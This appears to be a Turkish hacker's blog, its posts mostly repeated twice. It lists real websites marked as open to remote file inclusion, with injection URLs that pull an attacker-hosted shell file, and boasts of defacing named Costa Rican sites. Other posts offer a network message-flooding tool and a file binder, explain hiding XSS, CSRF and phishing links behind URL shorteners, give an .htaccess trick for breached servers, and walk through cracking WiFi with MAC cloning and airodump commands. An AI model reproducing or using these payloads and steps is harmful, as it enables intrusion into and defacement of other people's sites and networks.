Hack Haber hayatım başladı..

 S.a
evt arkadaşlar dedigim gibi hacktebugun.com tarafsız hack haber sitesinde    30.12.2009  yani bugun hack haber hayatımdaki ilk adımı attım.. Bütün dost bildiklerimden ve beni dost bilenlerden desteklerini bekliyorum..

HackHaber İletisim : medya@hacktebugun.com              

Hack Haber hayatım başladı..

 S.a
evt arkadaşlar dedigim gibi hacktebugun.com tarafsız hack haber sitesinde    30.12.2009  yani bugun hack haber hayatımdaki ilk adımı attım.. Bütün dost bildiklerimden ve beni dost bilenlerden desteklerini bekliyorum..

HackHaber İletisim : medya@hacktebugun.com              

rfı açıklı siteler

http://www.nadirfotografevi.net/templates/javanya/index.php
http://www.inandanismanlik.com/inan.php?id=http://webkanki.com/ege.txt?
http://www.mersinrotaract.org/rotaract.php?r=http://webkanki.com/ege.txt?
http://www.fesam.org/sur_makale.php?url=http://webkanki.com/ege.txt?
http://www.dogaldagitim.com.tr/tmp/ege.php
http://www.aralikedebiyat.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/demo_images/linux/ege.php
http://www.turkburosen.org.tr//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://webkanki.com/ege.txt?
http://www.confiteriacentral.cl/index.php?link=http://webkanki.com/ege.txt? 2.6.18 2008
http://www.techplus.ie/spaw/spaw_control.class.php?spaw_root=http://webkanki.com/ege.txt?
http://www.birminghamsciencecity.com/about/people/working.php?incFile=http://webkanki.com/ege.txt?
http://gioia-m.jp//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://webkanki.com/ege.txt?

rfı açıklı siteler

http://www.nadirfotografevi.net/templates/javanya/index.php
http://www.inandanismanlik.com/inan.php?id=http://webkanki.com/ege.txt?
http://www.mersinrotaract.org/rotaract.php?r=http://webkanki.com/ege.txt?
http://www.fesam.org/sur_makale.php?url=http://webkanki.com/ege.txt?
http://www.dogaldagitim.com.tr/tmp/ege.php
http://www.aralikedebiyat.com/wp-content/plugins/xinha4wp/xinha_core/plugins/ImageManager/demo_images/linux/ege.php
http://www.turkburosen.org.tr//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://webkanki.com/ege.txt?
http://www.confiteriacentral.cl/index.php?link=http://webkanki.com/ege.txt? 2.6.18 2008
http://www.techplus.ie/spaw/spaw_control.class.php?spaw_root=http://webkanki.com/ege.txt?
http://www.birminghamsciencecity.com/about/people/working.php?incFile=http://webkanki.com/ege.txt?
http://gioia-m.jp//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://webkanki.com/ege.txt?

HackteBugun İle yaptıgım guzel roportaj..

 habere aşadaki linkten ulaşabilirsiniz..
http://www.hacktebugun.com/haberdetay/1212-ByEge-İle-Roportaj.html

HackteBugun İle yaptıgım guzel roportaj..

 habere aşadaki linkten ulaşabilirsiniz..
http://www.hacktebugun.com/haberdetay/1212-ByEge-İle-Roportaj.html

5 site hacked

http://dcl.cr/
http://emarketing.cr/
http://infusion.pro/   -----> Pro.. xD
http://keen.cr/
http://keenserver.com/

http://sanalturkler.org/defacements/?id=19851
http://sanalturkler.org/defacements/?id=19850
http://sanalturkler.org/defacements/?id=19849
http://sanalturkler.org/defacements/?id=19848
http://sanalturkler.org/defacements/?id=19847

5 site hacked

http://dcl.cr/
http://emarketing.cr/
http://infusion.pro/   -----> Pro.. xD
http://keen.cr/
http://keenserver.com/

http://sanalturkler.org/defacements/?id=19851
http://sanalturkler.org/defacements/?id=19850
http://sanalturkler.org/defacements/?id=19849
http://sanalturkler.org/defacements/?id=19848
http://sanalturkler.org/defacements/?id=19847

Digital Factory Kosta Rika Hacked..

site :   http://digitalfactory.cr/
zone : http://sanalturkler.org/defacements/?id=19836
zone : http://mirrorturk.com/deface_mirror/?id=13184



site : http://www.digitalfactory.co.cr/
zone : http://sanalturkler.org/defacements/?id=19831
zone : http://mirrorturk.com/deface_mirror/?id=13183

maksat eglence..

Digital Factory Kosta Rika Hacked..

site :   http://digitalfactory.cr/
zone : http://sanalturkler.org/defacements/?id=19836
zone : http://mirrorturk.com/deface_mirror/?id=13184



site : http://www.digitalfactory.co.cr/
zone : http://sanalturkler.org/defacements/?id=19831
zone : http://mirrorturk.com/deface_mirror/?id=13183

maksat eglence..

WordPress Kosta Rika Hacked.!

site : http://wordpress.cr/

zone : http://mirrorturk.com/deface_mirror/?id=13182
zone : http://sanalturkler.org/defacements/?id=19828

WordPress Kosta Rika Hacked.!

site : http://wordpress.cr/

zone : http://mirrorturk.com/deface_mirror/?id=13182
zone : http://sanalturkler.org/defacements/?id=19828

Net Send Bomber

Net Send Bomber
Platform:	Windows (Tümü)
Dil:	Delphi
Boyut:	374 kb
Yazıldığı yıl:	2005
Eklendiği tarih:	07.10.2009
Açıklama:
Program yerel ağda herhangi bir pc'ye belirlediğiniz aralıklarda, belirlediğiniz sayıda yada sınırsız sayıda istediğiniz mesajı atarak karşı tarafın bilgisayarının mesaj yağmuru altında kalmasını, PC'sinin donmasını, yavaşlamasını sağlıyor. Tek yapmanız gereken karşı PC'nin adını veya ağdaki ipsini girmek. Program messenger hizmeti üstünde çalıştığı için o kişiye birşey göndermenize gerek yoktur.   İndirme Linki : http://alpgulec.com/Net Send Bomber 1.0.zip

Net Send Bomber

Net Send Bomber
Platform:	Windows (Tümü)
Dil:	Delphi
Boyut:	374 kb
Yazıldığı yıl:	2005
Eklendiği tarih:	07.10.2009
Açıklama:
Program yerel ağda herhangi bir pc'ye belirlediğiniz aralıklarda, belirlediğiniz sayıda yada sınırsız sayıda istediğiniz mesajı atarak karşı tarafın bilgisayarının mesaj yağmuru altında kalmasını, PC'sinin donmasını, yavaşlamasını sağlıyor. Tek yapmanız gereken karşı PC'nin adını veya ağdaki ipsini girmek. Program messenger hizmeti üstünde çalıştığı için o kişiye birşey göndermenize gerek yoktur.   İndirme Linki : http://alpgulec.com/Net Send Bomber 1.0.zip

Otomatik Toplu Mesaj Gönderici (MgsPlus!)

Platform:	Msn Plus Eklentisi
Dil:	Javascript & Apiler
Boyut:	3 kb
Yazıldığı yıl:	2007
Eklendiği tarih:	06.10.2009
Açıklama:
Listenizdeki tüm online kişilere mesajlarınızı toplu olarak iletmenize yarayan Msn Plus scriptim.İstenilen zaman aralığında, listenizde online olan kişilerden seçtiklerinize toplu olarak mesaj göndermenizi sağlar. Kişi seçme özelliğinin bulunması mesaj göndermek istemediğiniz kişileri gönderim listesinden çıkartmanızı sağlar.   İndirme Linki http://alpgulec.com/OtomatikTopluMesajScripti.rar

Otomatik Toplu Mesaj Gönderici (MgsPlus!)

Platform:	Msn Plus Eklentisi
Dil:	Javascript & Apiler
Boyut:	3 kb
Yazıldığı yıl:	2007
Eklendiği tarih:	06.10.2009
Açıklama:
Listenizdeki tüm online kişilere mesajlarınızı toplu olarak iletmenize yarayan Msn Plus scriptim.İstenilen zaman aralığında, listenizde online olan kişilerden seçtiklerinize toplu olarak mesaj göndermenizi sağlar. Kişi seçme özelliğinin bulunması mesaj göndermek istemediğiniz kişileri gönderim listesinden çıkartmanızı sağlar.   İndirme Linki http://alpgulec.com/OtomatikTopluMesajScripti.rar

dosya birleştirme programı, dosya birleştirme, dosya gömme, dosya saklama

Bu program herhangi bir dosyayı bir

dosyanın içine gömmeye yarıyor. Gizli saklı dosyalarınız varsa bunu ortalıkta tutmak yerine bir dosyanın içine gömersiniz ve ihtiyacınız olduğunda çıkartırsınız. Örneğin bir belgenin bir oyun dosyasının içinde saklanması. Oyuna dosya eklediğiniz zaman oyun çalışır halde olacak sadece boyutu büyüyecek. Dosyayı eklediğiniz zaman ana dosya sorunsuzca çalışmaktadır. Sadece içindeki dosyadan dolayı boyutu büyükmektedir. İçine gömdüğünüz dosyayı çıkarttığınızda ana dosyanın boyutu tekrar eski haline gelecek ve sorunsuzca çalışmaya devam edecektir. Gizli dosyanızın asla erişilemeyecek bir yerde olması kendinizi güvende hissetmenizi sağlayacaktır. Programın anlatımı rar dosyasının içinde mevcut. Programı kullanmadan önce yardıma gözatmanızı tavsiye ederim.

indirme linki.
http://www.alpgulec.com/dosyagomme.rar

dosya birleştirme programı, dosya birleştirme, dosya gömme, dosya saklama

Bu program herhangi bir dosyayı bir

dosyanın içine gömmeye yarıyor. Gizli saklı dosyalarınız varsa bunu ortalıkta tutmak yerine bir dosyanın içine gömersiniz ve ihtiyacınız olduğunda çıkartırsınız. Örneğin bir belgenin bir oyun dosyasının içinde saklanması. Oyuna dosya eklediğiniz zaman oyun çalışır halde olacak sadece boyutu büyüyecek. Dosyayı eklediğiniz zaman ana dosya sorunsuzca çalışmaktadır. Sadece içindeki dosyadan dolayı boyutu büyükmektedir. İçine gömdüğünüz dosyayı çıkarttığınızda ana dosyanın boyutu tekrar eski haline gelecek ve sorunsuzca çalışmaya devam edecektir. Gizli dosyanızın asla erişilemeyecek bir yerde olması kendinizi güvende hissetmenizi sağlayacaktır. Programın anlatımı rar dosyasının içinde mevcut. Programı kullanmadan önce yardıma gözatmanızı tavsiye ederim.

indirme linki.
http://www.alpgulec.com/dosyagomme.rar

Short Url, URL Kisaltma Mantigi İle Hacking Taktikleri Resimli

Merhaba arkadaslar ne zamandır bu dokumanı yazmak ıcın zaman arıyordum sizlere simdi url kısaltma mantıgı ile karsı tarafa istedigimizi Kamufle ederek yedirmeyi anlatıcam.Ben suan bunu bir rapid pisherda kullanıyorum rmxle benım elımden gecmis pisher uzerınde.

Kullanabiliceginiz Alanlar

XSS
XSRF
CSRF
Html Trojan
Pishing

Siteler (Google'de Cok fazla var Bulabilirsiniz)

www.lix.in (sayfayı kendi uzerinden acar)
www.kisalink.com
www.linkslash.com
www.kisaca.net (sayfayı kendi uzerinden acar)

NOT : Google uzerinden url kısaltma bulmak icin Short Url veya url kısalt yazarak daha fazla bulabılırsınız.

Simdi basit bir xss acıgında resimli uygulama yapalım..( Ben lix.in uzerinden gostericem)

Mynet Xss Yedirme Resim-1

Resim2 (Link kamufle ediliyor)

 

Resim-3 (Link Hazır)

  

Resim-4 (Kurban XSS linkini farketmeden yiyor)

 

Bu Mantıgı Ustte yazdıgım tum alanlarda kullanabılırsınız mantıgı ıslevı lınklerınızı kamufle etmek free hostlardan bile kullansanız kurban bunu anlamayacaktır.Bu yontemle en guzel html logger ve Csrf yedirilir.Ben sadece Calısma mantıgını ve calıstıgını gostermek amaclı resımler ekledım..

NOT : Resimlerdeki notları okuyunuz

TurkXakep | Attackerz.Com | Attack3rz Crew

Short Url, URL Kisaltma Mantigi İle Hacking Taktikleri Resimli

Merhaba arkadaslar ne zamandır bu dokumanı yazmak ıcın zaman arıyordum sizlere simdi url kısaltma mantıgı ile karsı tarafa istedigimizi Kamufle ederek yedirmeyi anlatıcam.Ben suan bunu bir rapid pisherda kullanıyorum rmxle benım elımden gecmis pisher uzerınde.

Kullanabiliceginiz Alanlar

XSS
XSRF
CSRF
Html Trojan
Pishing

Siteler (Google'de Cok fazla var Bulabilirsiniz)

www.lix.in (sayfayı kendi uzerinden acar)
www.kisalink.com
www.linkslash.com
www.kisaca.net (sayfayı kendi uzerinden acar)

NOT : Google uzerinden url kısaltma bulmak icin Short Url veya url kısalt yazarak daha fazla bulabılırsınız.

Simdi basit bir xss acıgında resimli uygulama yapalım..( Ben lix.in uzerinden gostericem)

Mynet Xss Yedirme Resim-1

Resim2 (Link kamufle ediliyor)

 

Resim-3 (Link Hazır)

  

Resim-4 (Kurban XSS linkini farketmeden yiyor)

 

Bu Mantıgı Ustte yazdıgım tum alanlarda kullanabılırsınız mantıgı ıslevı lınklerınızı kamufle etmek free hostlardan bile kullansanız kurban bunu anlamayacaktır.Bu yontemle en guzel html logger ve Csrf yedirilir.Ben sadece Calısma mantıgını ve calıstıgını gostermek amaclı resımler ekledım..

NOT : Resimlerdeki notları okuyunuz

TurkXakep | Attackerz.Com | Attack3rz Crew

Symlink Permission @ Priv8

Merhaba arkadaşlar,

Herhangi bir servera girdiniz ve safe mode off ancak disable fonksiyonlarda symlink engellenmiş ve siz symlink ile dosya çağırıp browserde girdiğinizde " You don't have permission to access khi symlink " hatası alıyorsanız,aşağıda paylaştığım .htaccess kodunu siteye .htaccess olarak yüklemeniz yeterli olacaktır


Kod..

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

kaynak :  http://h4ckz.net/act/index.php?topic=182.0 

Symlink Permission @ Priv8

Merhaba arkadaşlar,

Herhangi bir servera girdiniz ve safe mode off ancak disable fonksiyonlarda symlink engellenmiş ve siz symlink ile dosya çağırıp browserde girdiğinizde " You don't have permission to access khi symlink " hatası alıyorsanız,aşağıda paylaştığım .htaccess kodunu siteye .htaccess olarak yüklemeniz yeterli olacaktır


Kod..

Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes

kaynak :  http://h4ckz.net/act/index.php?topic=182.0 

Backtrack Kullanımı ( Wireless şifre Kırma ), wireless hack

Okumaya Baslamadan Önce;

bu sitemin çalisabilmesi için Linux tabanli Kernel'i kullanmaniz gerekmekte. Ayrica çok genis bir WordList e sahip olmaniz gerekiyor ki bu da biraz zor olacagi anlamina gelir. Çünkü kaliteli ve çok genis bir WordList GB lar boyutunda. Diyelim ki böyle bir wordlist yaptiniz sorun bitti mi peki? Malesef hayir. Çünkü bu kadar büyük bir wordlist ile çalisirken program hata verebiliyor. Bazen donma olaylari da mevcut. Ama karsimizdakinin acemi oldugunu ve öle karmasik sifreleme kullanmaycagini düsünürsek bu is ise yarayabilir...

backtrack download:
http://ftp://mirror.switch.ch/mirror/backtrack/

wep crack video :
http://milw0rm.com/video/?start=60#

backtrack açilis sifreleri

giris(id) = root
sifre = toor

daha sonra

komut satirina sunu yazin

startx

ve backtrack masaüstü açilacaktir

WEB SIFRESI KIRMA

Dinleme Modu


Kablosuz aglarla ilgili yapilacak her islem "dinleme" ile baslar. Yani havada dolasan kablosuz sinyalleri yakalamak.. Eger kullandiginiz kablosuz ag cihazi (PCI, USB ya da PCMCIA olabilir) dinleme moduna destek vermiyorsa hiç birsey yapamazsiniz.

Ayrica kablosuz ag cihazinin sürücülerinin back-track in içerisinde yüklü olmasi gerekir. Back track cd sini takip, bilgisayarinizi yeniden baslattiktan sonra, ilk is olarak back track in kablosuz ag birimlerinizi taniyip tanimadigini kontrol etmelisiniz. Bunun için airmon script aracini kullanacagiz. (Bu araca ulasmak için KDE menüsünden Wireless Tools > Cracking > Air Crack > Airmon yolunu izlemelisiniz

Resimde gördügünüz gibi bizim kullandigimiz makinede eth0 arabirimini kullanan centrino b/g model bir kablosuz ag karti bulunuyor. Bu kart ipw2200 sürücüsünü kullaniyor. Buradaki eth0 arabirimi bizim için özellikle önemli. Çünkü her asamada bu arabirimini kullanacagiz. Sizin cihaziniz eth1, wlan0 gibi bir baska arabirim kullaniyor olabilir. Bizim yazimizda eth0 olarak geçen ifadelerin yerine siz kendi arabiriminizi yazmalisiniz. Eger ki herhangi bir kablosuz ag sürücüsü bulunamazsa sisteminiz kablosuz aglara baglanamayacagindan, yazimizdaki uygulamalari gerçeklestiremezsiniz. Ancak bu noktada da çaresiz degilsiniz. internette küçük bir aramayla kullandiginiz ag aracina uygun Linux sürücülerini bulabilirsiniz. Ancak kullandiginiz araç broadcom chipset’i tasiyorsa isiniz oldukça zor. Öncelikle back track in kullandigi Linux çekirdegini güncelleyip, broadcom destegini kernel modülü olarak yüklemeniz gerekiyor. Bu islemi back track i sabit diskinize kurmadan yapamayacaginizi da hemen belirtelim. Bunun disinda back track in temeli ola Slackware ve Slax Linux dagitimlarinin paket depolarini gezerek derlenmis driver, kernel ve diger yazilimlari kolayca bulabilirsiniz. (back track canli dagitimina yazilim ya da sürücü kurabilirsiniz. Bu islem için sistemi kurmaniza gerek yoktur.) Bunun için öncelikle www.slax.org adresindeki ’modules’ sayfasina bakmanizi öneririz. Artik her seyimiz hazir. Biz, blackwhite’nin kablosuz internet agini kirmak için haziriz. Yazinin basinda da bahsetmistik. Ev ve ofislerde 3 çesit güvenlik yöntemi kullanilir. WPA sifreleme, WEP sifreleme ve MAC adres korumasi. Biz denemelerimize kirilmasi en basit olandan basladik; MAC adres korumasi..

MAC Adres Korumasini Asmak


Windows’ta kablosuz aglari arattiginizda karsiniza çikan bazi aglar "güvensiz" olarak gözükür ama aga baglanmak istediginizde bir türlü basarili olamazsiniz. Çünkü router görevi gören modem sadece, daha önce tanimlanmis olan MAC adreslere sahip cihazlara izin verir. Bunun disinda kalan "yabanci" cihazlarin ver akisini engeller. Sizin cihaziniz da izinli bir MAC adrese sahip olmadigindan sifresiz aga giris yaparsiniz ama hiç bir veri akisina katilamazsiniz. Bu durumu çözmek için çok basit bir yöntem var. Izinli olan MAC adreslerden birini ögrenip, bu adresi klonlamak. Yani bilgisayarinizin MAC adresini degistirmek... Bunun için öncelikle izinli olan bir MAC adres bulmalisiniz. Bunu yapmak hiç de düsündügünüz kadar zor degil.

Hedef Erisim Noktasini ve Kanali Belirleme

Klonlayacagimiz MAC adresini belirlemek için ilk olarak Kismet isimli programi kullanacagiz. back trackin "KDE" menüsünden "BackTrack > Wireless Tools > Analyzer" yolunu izleyerek Kismet isimli programi çalistirin. Kismet aslinda menzilinizdeki tüm kablosuz aglar üzerinden geçen bilgileri yakalayip kaydeden bir program. Bu yüzden Kismet’i ilk açtiginizda, program size yakaladigi bilgileri nereye kaydedecegini soracak. Masaüstü ya da herhangi baska bir yeri seçip devam tusuna basabilirsiniz. Ardindan bir siren sesiyle Kismet’in arabirimiyle karsilacaksiniz. Bizim yaptigimiz denemede ofisimizin yakininda birçok ag çikti. Bizim hedefimiz ise "blackwhite" isimli modeme girebilmekti

Resim 1 de gördügünüz gibi blackwhite isimli kablosuz ag 5. kanaldan yayin yapiyor. istedigimiz ilk bilgiyi almis olduk. Kismet’i kapatip 5. kanali daha yakindan izlemeye çalisalim

izinli bir MAC Adresi Bulmak

5. kanali daha yakindan takip etmek için Airodump isimli uygulamayi kullaniyoruz. Bunun için "KDE" menüsünden "BackTrack > Wireless Tools > Cracking > Aircrack" yolundan Airodump uygulamasini çalistiriyoruz. Açilan konsolda asagidaki komutu yazmamiz gerekiyor.

airodump-ng --channel 5 --write dosya eth0

Bu komutta yapmak istedigimiz islem su: 5. kanaldaki yayinlari eth0 arabirimindeki kablosuz ag cihazi ile yakalayip yakalanan verileri ’dosya’ ismiyle kaydettiriyoruz. Burada lütfen yazdigimiz komuttaki parametrelere dikkat edin. Ayni denemeyi siz yapacaksiniz, kullanacaginiz kanal ve arabirim (eth0) farkli olacaktir. BIzim test sistemimizde eth0 kablosuz ag karti, eth1 ise ethernet kartina denk geliyor. Siz sisteminizde wlan0 wlan1 isimler kullanmak zorunda kalabilirsiniz. simdi dinlemeye basliyoruz. Birkaç saniye beklediginizde aga bagli cihazlar tek tek dökülmeye baslayacak

Resim 2 de ilk üç cihaz dogrudan kablosuz modeme baglanmis durumda. Diger dördüncü bilgisayarin ise muhtemelen kablosuz ag adaptörü açik ama herhangi bir modeme bagli degil. Büyük ihtimalle listedeki ilk 3 MAC adresinin modemden izni var. Bu yüzden bu MAC adresleri klonlayarak bu modeme erisim saglayabilecegimizi düsünüyoruz. simdi cd yi çikartip yeniden Windows’a dönme zamani geldi. Windows’ta MAC adresimizi degistirmeyi deneyecegiz. Bazi kablosuz ag kartlari MAC adresinizi dogrudan degistirmenize izin veriyor. Eger siz de bu kartlardan birini kullaniyorsaniz isiniz çok kolay. Masaüstündeki "Ag Baglantilarim" a sag tiklayip "Özellikler" menüsünü seçin. "Yapilandir" butonuna basin ve "Gelismis" sekmesine geçin. Listede ’Mac Adresi’ gibi bir seçenek olmasi gerekiyor. Buradan Deger kismina not ettigimiz MAC adreslerinden birini giriyoruz. OK tusuna bastiginizda artik MAC adresinizin degismis olmasi lazim. Artik MAC adres filtreleme metoduyla güvenlik saglamaya çalisan blackwhite agina baglanabilirsiniz. Eger sizin ag
kartiniz MAC adresini degistirmenize izin vermiyorsa sorun degil. MAC adresini degistiren birçok program bulabilirsiniz. Ama bu programlar deneme sürümlerinde MAC adresini rasgele degistirir.
Yani sizin istediginiz MAC adresini girmenize izin vermez. Bu yüzden eger parasini verip programi satin almayacaksaniz, ayni islemi kayit defteri üzerinden de yapabilirsiniz

Kayit Defterinden MAC Adresini Degistirmek

Bu isleme baslamadan önce kayit defterinizin yedegini almayi unutmayin. Eger yanlis bir islem yaparsaniz sisteminiz zarar görebilir. MAC adresini degistirmek için önce "Baslat" menüsünden "Çalistir" a gelin ve "cmd" yazarak komut satirina geçin. Kablosuz ag adaptörünüz takili ve çalisir durumdayda su komutu yazin: net config rdr



simdi resim 3 teki gibi bir ekran görüyor olmalisiniz. Bu ekranda gördügünüz ayraçlar içindeki uzunca bölüm GUID (Globally Unique ID) numarasidir. Hemen onun yanindaki ise MAC adresiniz.. GUID numarasini bir kenara not edin. "Baslat" menüsünden "Çalistir" a gelip regedit yazin. HKEY_LOCAL_MACHINE\\\\\\\\\\\\\\\\SYST EM\\\\\\\\\\\\\\\\CurrentControlSet\\\\\\ \\\\\\\\\\Control\\\\\\\\\\\\\\\\Class yolunu izleyin ve bu yolun sonunda GUID numaranizi bulun. Alt alta 0000, 0001 gibi klasörlerle karsilasacaksiniz. Bu klasörlere tiklayarak AdapterModel kisminda Wireless adaptörünüzü bulmaya çalisin. Dogru adaptörü buldugunuzda alt satirlardan NetworkAdress kismi karsiniza çikacaktir. Burada yapmaniz gereken, MAC adresinizi istediginiz baska bir adresle degistirmek. Aslinda MAC adres korumali bir aga girmek için ihtiyaciniz olan bilgileri Windows altinda çalisan NetStumbler isimli programla elde edebilirsiniz. Ancak biz WEP ve WPA sifrelerini de kirarken back track i kullanacagimiz için konuyu dagitmamak adina NetStumbler i ise karistirmadik.

WEP SIFRELERINI KIRMAK

WEP sifreleri 10 hanelidir ve içinde sadece A’dan F’ye kadar harfler ve 0 dan 9 a kadar rakamlar bulunur. Bu yüzden de kombinasyon sayisi sinirlidir. Yani kirilmasi daha kolaydir. Günümüzde bu sifreleme yetersiz kaldigindan daha güvenli olan WPA sifreleme yöntemi gelistirilmistir. WEP in hala kullaniliyor olmasinin nedeni ise kismen geriye dönük uyumluluk, kismen kablosuz dagitim sistemini desteklemesidir. WEP yönteminin nasil kirildigina geçmeden önce basit bir sekilde WEP yönteminin nasil islediginden bahsedelim. WEP yönteminde kablosuz ag dagiticisi, modem ya da router kendine bir istek geldiginde rastgele 128 bitlik bir metin olusturup kablosuz baglantiyi yapacak cihaza (notebook, PDA vs) gönderir. Cihaz kendisindeki WEP sifresi ile bu gelen manasiz metni sifreler ve geri gönderir. Modem kendisine gelen sifreli metnin dogru sifrelenip sifrelenmedigine bakarak baglantiyi onaylar ya da reddeder. Bu arada baglantiyi dinleyen bir kisi rast gele seçilen 128 bitlik veriyi ve daha sonra bu verinin sifrelenmis halini yakalayabilir. Ama WEP ise sifrelenmis verilerin içerisinde intialization Cector (IV) denen datalar kullanilir. Bu IV datalari her pakette degisir. Yani modem üzerinde ne kadar trafik varsa o kadar çok IV vardir. IV datalari, paket içerisinde sifrelenmez çünkü bu datalar tekrar açilirken bu IV ler kullanilacaktir. IV’lerin amaci ayni metnin iki kez geçilmesi durumunda farkli sifrelenmis datalar olusmasini engellemektir. IV datalari 24 bit uzunlugundadir. Bu yüzden 64 bit WEP ise sifrelenmis bir data aslinda 40 bittir. Çünkü 24 bit IV’den olusmaktadir. 24 bit kisa bir dizi oldugundan trafik arttikça IV’ler tekrar girebilir. iste WEP’in kirilma fikrinin ana temasi da buradan ortaya çikiyor. Amaç tekrar eden IV’leri yakalamak. Tabii isin mantigi bu kadar kolay degil. Ama olayin pratikteki kullanimini anlatabilmemiz için simdlik bu kadari yeterli.

Hedefi Tespit Etmek


Simdi amacimiz blackwhite kablosuz agina davetsiz olarak misafir olarak girmek ve yüksek hizda internet baglantisina erisebilmek. Bunun için öncelikle blackwhite agi hakkinda bilgi alacagiz. Sonra bu agdaki sifreli paketlerden toplayabildigimiz kadar toplayacagiz ve son olarak da sifreyi kirmayi deneyecegiz. ilk olarak Kismet isimli programi çalistiriyoruz. Kismet açildiktan kisa bir süre sonra blackwhite agini görüyoruz

Backtrack Kullanımı ( Wireless şifre Kırma ), wireless hack

Okumaya Baslamadan Önce;

bu sitemin çalisabilmesi için Linux tabanli Kernel'i kullanmaniz gerekmekte. Ayrica çok genis bir WordList e sahip olmaniz gerekiyor ki bu da biraz zor olacagi anlamina gelir. Çünkü kaliteli ve çok genis bir WordList GB lar boyutunda. Diyelim ki böyle bir wordlist yaptiniz sorun bitti mi peki? Malesef hayir. Çünkü bu kadar büyük bir wordlist ile çalisirken program hata verebiliyor. Bazen donma olaylari da mevcut. Ama karsimizdakinin acemi oldugunu ve öle karmasik sifreleme kullanmaycagini düsünürsek bu is ise yarayabilir...

backtrack download:
http://ftp://mirror.switch.ch/mirror/backtrack/

wep crack video :
http://milw0rm.com/video/?start=60#

backtrack açilis sifreleri

giris(id) = root
sifre = toor

daha sonra

komut satirina sunu yazin

startx

ve backtrack masaüstü açilacaktir

WEB SIFRESI KIRMA

Dinleme Modu


Kablosuz aglarla ilgili yapilacak her islem "dinleme" ile baslar. Yani havada dolasan kablosuz sinyalleri yakalamak.. Eger kullandiginiz kablosuz ag cihazi (PCI, USB ya da PCMCIA olabilir) dinleme moduna destek vermiyorsa hiç birsey yapamazsiniz.

Ayrica kablosuz ag cihazinin sürücülerinin back-track in içerisinde yüklü olmasi gerekir. Back track cd sini takip, bilgisayarinizi yeniden baslattiktan sonra, ilk is olarak back track in kablosuz ag birimlerinizi taniyip tanimadigini kontrol etmelisiniz. Bunun için airmon script aracini kullanacagiz. (Bu araca ulasmak için KDE menüsünden Wireless Tools > Cracking > Air Crack > Airmon yolunu izlemelisiniz

Resimde gördügünüz gibi bizim kullandigimiz makinede eth0 arabirimini kullanan centrino b/g model bir kablosuz ag karti bulunuyor. Bu kart ipw2200 sürücüsünü kullaniyor. Buradaki eth0 arabirimi bizim için özellikle önemli. Çünkü her asamada bu arabirimini kullanacagiz. Sizin cihaziniz eth1, wlan0 gibi bir baska arabirim kullaniyor olabilir. Bizim yazimizda eth0 olarak geçen ifadelerin yerine siz kendi arabiriminizi yazmalisiniz. Eger ki herhangi bir kablosuz ag sürücüsü bulunamazsa sisteminiz kablosuz aglara baglanamayacagindan, yazimizdaki uygulamalari gerçeklestiremezsiniz. Ancak bu noktada da çaresiz degilsiniz. internette küçük bir aramayla kullandiginiz ag aracina uygun Linux sürücülerini bulabilirsiniz. Ancak kullandiginiz araç broadcom chipset’i tasiyorsa isiniz oldukça zor. Öncelikle back track in kullandigi Linux çekirdegini güncelleyip, broadcom destegini kernel modülü olarak yüklemeniz gerekiyor. Bu islemi back track i sabit diskinize kurmadan yapamayacaginizi da hemen belirtelim. Bunun disinda back track in temeli ola Slackware ve Slax Linux dagitimlarinin paket depolarini gezerek derlenmis driver, kernel ve diger yazilimlari kolayca bulabilirsiniz. (back track canli dagitimina yazilim ya da sürücü kurabilirsiniz. Bu islem için sistemi kurmaniza gerek yoktur.) Bunun için öncelikle www.slax.org adresindeki ’modules’ sayfasina bakmanizi öneririz. Artik her seyimiz hazir. Biz, blackwhite’nin kablosuz internet agini kirmak için haziriz. Yazinin basinda da bahsetmistik. Ev ve ofislerde 3 çesit güvenlik yöntemi kullanilir. WPA sifreleme, WEP sifreleme ve MAC adres korumasi. Biz denemelerimize kirilmasi en basit olandan basladik; MAC adres korumasi..

MAC Adres Korumasini Asmak


Windows’ta kablosuz aglari arattiginizda karsiniza çikan bazi aglar "güvensiz" olarak gözükür ama aga baglanmak istediginizde bir türlü basarili olamazsiniz. Çünkü router görevi gören modem sadece, daha önce tanimlanmis olan MAC adreslere sahip cihazlara izin verir. Bunun disinda kalan "yabanci" cihazlarin ver akisini engeller. Sizin cihaziniz da izinli bir MAC adrese sahip olmadigindan sifresiz aga giris yaparsiniz ama hiç bir veri akisina katilamazsiniz. Bu durumu çözmek için çok basit bir yöntem var. Izinli olan MAC adreslerden birini ögrenip, bu adresi klonlamak. Yani bilgisayarinizin MAC adresini degistirmek... Bunun için öncelikle izinli olan bir MAC adres bulmalisiniz. Bunu yapmak hiç de düsündügünüz kadar zor degil.

Hedef Erisim Noktasini ve Kanali Belirleme

Klonlayacagimiz MAC adresini belirlemek için ilk olarak Kismet isimli programi kullanacagiz. back trackin "KDE" menüsünden "BackTrack > Wireless Tools > Analyzer" yolunu izleyerek Kismet isimli programi çalistirin. Kismet aslinda menzilinizdeki tüm kablosuz aglar üzerinden geçen bilgileri yakalayip kaydeden bir program. Bu yüzden Kismet’i ilk açtiginizda, program size yakaladigi bilgileri nereye kaydedecegini soracak. Masaüstü ya da herhangi baska bir yeri seçip devam tusuna basabilirsiniz. Ardindan bir siren sesiyle Kismet’in arabirimiyle karsilacaksiniz. Bizim yaptigimiz denemede ofisimizin yakininda birçok ag çikti. Bizim hedefimiz ise "blackwhite" isimli modeme girebilmekti

Resim 1 de gördügünüz gibi blackwhite isimli kablosuz ag 5. kanaldan yayin yapiyor. istedigimiz ilk bilgiyi almis olduk. Kismet’i kapatip 5. kanali daha yakindan izlemeye çalisalim

izinli bir MAC Adresi Bulmak

5. kanali daha yakindan takip etmek için Airodump isimli uygulamayi kullaniyoruz. Bunun için "KDE" menüsünden "BackTrack > Wireless Tools > Cracking > Aircrack" yolundan Airodump uygulamasini çalistiriyoruz. Açilan konsolda asagidaki komutu yazmamiz gerekiyor.

airodump-ng --channel 5 --write dosya eth0

